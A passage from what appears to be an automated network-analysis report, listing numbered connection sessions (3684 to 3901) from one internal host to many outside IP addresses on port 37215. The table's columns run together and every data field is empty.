                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3684192.168.2.2344996157.61.110.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3685192.168.2.234706841.172.247.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3686192.168.2.234673689.29.3.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3687192.168.2.2338356222.126.182.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3688192.168.2.233693441.91.53.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3689192.168.2.2339990197.147.85.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3690192.168.2.234496641.73.74.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3691192.168.2.2338170157.231.110.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3692192.168.2.2357028197.36.3.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3693192.168.2.2335630197.83.92.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3694192.168.2.2337482143.64.189.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3695192.168.2.234862641.38.138.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3696192.168.2.235076241.208.220.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3697192.168.2.2339548141.191.110.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3698192.168.2.2349176124.211.72.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3699192.168.2.235091841.228.26.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3700192.168.2.2340668157.189.237.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3701192.168.2.2348752157.179.56.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3702192.168.2.2345456122.158.80.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3703192.168.2.2337972157.170.30.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3704192.168.2.2352204197.146.97.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3705192.168.2.2359150122.170.177.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3706192.168.2.2349610197.93.25.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3707192.168.2.234890241.147.166.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3708192.168.2.2341690197.213.247.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3709192.168.2.2339540157.95.196.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3710192.168.2.2343666197.36.244.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3711192.168.2.234714884.106.149.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3712192.168.2.2333890157.224.176.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3713192.168.2.2341720157.6.247.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3714192.168.2.2340616197.21.118.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3715192.168.2.2355648197.118.115.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3716192.168.2.233511441.123.109.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3717192.168.2.235629841.91.198.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3718192.168.2.2336070197.207.2.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3719192.168.2.2353004157.186.164.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3720192.168.2.235074895.57.20.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3721192.168.2.2343502126.90.153.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3722192.168.2.235638641.129.201.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3723192.168.2.234276691.178.113.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3724192.168.2.2342588197.124.38.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3725192.168.2.235619441.209.219.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3726192.168.2.2336624197.59.210.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3727192.168.2.234892841.181.59.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3728192.168.2.235789841.128.126.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3729192.168.2.2338012157.39.122.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3730192.168.2.2351400147.113.209.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3731192.168.2.2354108184.71.10.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3732192.168.2.2358856157.235.65.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3733192.168.2.233667641.211.111.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3734192.168.2.234040493.12.44.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3735192.168.2.2338500134.84.101.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3736192.168.2.2343124197.242.150.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3737192.168.2.235700841.27.214.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3738192.168.2.2340762157.242.104.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3739192.168.2.233796841.155.226.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3740192.168.2.2335604157.38.104.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3741192.168.2.2352650157.162.144.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3742192.168.2.2353874116.172.54.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3743192.168.2.2356336197.225.216.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3744192.168.2.234079841.188.49.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3745192.168.2.2341712157.76.163.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3746192.168.2.2343872197.50.105.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3747192.168.2.234366265.228.81.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3748192.168.2.234860841.226.27.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3749192.168.2.2346334157.93.8.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3750192.168.2.2348118197.150.216.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3751192.168.2.2340036197.46.224.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3752192.168.2.235496041.93.216.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3753192.168.2.2339306197.214.200.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3754192.168.2.234916281.221.103.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3755192.168.2.234138841.208.46.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3756192.168.2.2351768157.20.150.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3757192.168.2.2340724197.241.206.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3758192.168.2.233512441.41.230.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3759192.168.2.2352456197.42.96.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3760192.168.2.2352136157.141.111.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3761192.168.2.2354580157.162.196.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3762192.168.2.2334908157.43.118.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3763192.168.2.2344726160.27.61.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3764192.168.2.23398248.195.70.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3765192.168.2.2355688157.209.75.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3766192.168.2.2334066157.228.123.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3767192.168.2.2356430197.74.24.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3768192.168.2.233592281.248.124.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3769192.168.2.2347540157.26.121.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3770192.168.2.2358894197.92.66.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3771192.168.2.2348764157.209.105.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3772192.168.2.2348214135.113.239.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3773192.168.2.2344712157.117.139.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3774192.168.2.2334732157.116.124.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3775192.168.2.235285241.226.144.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3776192.168.2.235872641.56.214.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3777192.168.2.2356786157.165.0.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3778192.168.2.2352488197.165.73.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3779192.168.2.2350694157.245.33.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3780192.168.2.2347110116.107.178.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3781192.168.2.2350020157.108.146.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3782192.168.2.233328666.58.205.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3783192.168.2.233459841.248.116.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3784192.168.2.235276441.22.21.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3785192.168.2.2337698197.111.163.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3786192.168.2.2346200197.63.235.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3787192.168.2.235214641.219.35.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3788192.168.2.233344441.248.136.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3789192.168.2.2338926197.186.212.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3790192.168.2.234888441.124.172.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3791192.168.2.2352032157.69.8.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3792192.168.2.2350444157.61.138.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3793192.168.2.235593241.186.135.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3794192.168.2.2347038200.161.99.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3795192.168.2.235529241.138.177.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3796192.168.2.2344890157.152.43.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3797192.168.2.2343448177.134.184.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3798192.168.2.2341000197.207.82.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3799192.168.2.2359176197.96.9.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3800192.168.2.2343158157.72.72.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3801192.168.2.2356394157.94.41.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3802192.168.2.2358568194.98.71.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3803192.168.2.2339802197.156.118.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3804192.168.2.2340636157.5.99.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3805192.168.2.2340262197.106.191.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3806192.168.2.2352194197.77.52.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3807192.168.2.2335448197.129.37.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3808192.168.2.234089641.73.197.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3809192.168.2.235533841.42.31.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3810192.168.2.2347336197.38.27.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3811192.168.2.2339160197.194.90.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3812192.168.2.2335536157.175.224.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3813192.168.2.2347972157.106.39.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3814192.168.2.234828441.168.196.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3815192.168.2.2355772150.228.227.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3816192.168.2.2340020197.3.130.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3817192.168.2.2347760197.78.17.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3818192.168.2.2350110197.98.254.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3819192.168.2.2360108157.255.169.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3820192.168.2.2335434197.144.19.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3821192.168.2.2342416197.228.106.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3822192.168.2.2354352197.101.116.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3823192.168.2.2360336197.70.15.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3824192.168.2.2340294157.241.24.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3825192.168.2.2348112197.134.182.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3826192.168.2.2354362197.250.179.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3827192.168.2.2359752213.211.95.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3828192.168.2.235708241.243.196.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3829192.168.2.2334112197.49.1.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3830192.168.2.2332962197.102.118.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3831192.168.2.2337674197.217.49.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3832192.168.2.2342896157.243.82.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3833192.168.2.233510847.159.28.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3834192.168.2.2356714197.122.153.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3835192.168.2.2333702176.194.240.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3836192.168.2.2359920197.84.216.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3837192.168.2.2357514197.71.224.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3838192.168.2.2351606197.108.150.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3839192.168.2.2343382173.212.118.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3840192.168.2.2352430182.139.167.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3841192.168.2.2340032197.164.30.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3842192.168.2.2351616157.60.182.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3843192.168.2.234218041.93.187.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3844192.168.2.2339974197.10.71.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3845192.168.2.234394041.145.160.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3846192.168.2.2353398157.97.132.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3847192.168.2.2354836197.99.46.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3848192.168.2.235953465.155.245.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3849192.168.2.235492241.209.39.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3850192.168.2.2341160197.209.161.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3851192.168.2.235977080.48.57.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3852192.168.2.235242441.118.17.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3853192.168.2.235922641.49.100.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3854192.168.2.2335606197.8.143.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3855192.168.2.235986041.80.1.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3856192.168.2.2337368197.88.215.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3857192.168.2.2340164157.54.13.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3858192.168.2.2354812197.92.126.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3859192.168.2.234447641.244.35.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3860192.168.2.234546646.53.2.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3861192.168.2.2356976197.218.92.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3862192.168.2.2338490157.65.76.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3863192.168.2.234996417.54.119.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3864192.168.2.233579641.204.75.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3865192.168.2.2350222197.206.94.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3866192.168.2.2344698223.91.0.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3867192.168.2.2336010197.62.58.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3868192.168.2.2354162157.120.193.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3869192.168.2.2335476157.213.191.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3870192.168.2.235845441.153.116.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3871192.168.2.233461687.26.64.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3872192.168.2.2355952197.198.77.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3873192.168.2.2358884157.54.75.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3874192.168.2.2358576157.51.126.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3875192.168.2.2337394157.165.131.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3876192.168.2.2337920118.112.34.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3877192.168.2.2356924157.203.174.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3878192.168.2.235390441.19.171.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3879192.168.2.235171845.240.125.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3880192.168.2.2341220157.25.82.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3881192.168.2.235547441.203.237.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3882192.168.2.2348340157.155.212.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3883192.168.2.2355242197.1.181.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3884192.168.2.235339243.3.75.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3885192.168.2.234142841.13.228.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3886192.168.2.234133898.205.72.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3887192.168.2.2336082157.211.174.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3888192.168.2.2356482197.39.104.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3889192.168.2.2333572157.163.85.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3890192.168.2.235844266.207.116.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3891192.168.2.2337230157.1.171.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3892192.168.2.2339250147.37.248.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3893192.168.2.235646241.86.109.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3894192.168.2.235244041.131.80.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3895192.168.2.2334404157.140.255.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3896192.168.2.2359796157.110.21.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3897192.168.2.2357550157.71.60.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3898192.168.2.2360426197.99.187.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3899192.168.2.2346938197.81.124.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3900192.168.2.234580241.38.150.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3901192.168.2.2342706197.171.11.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
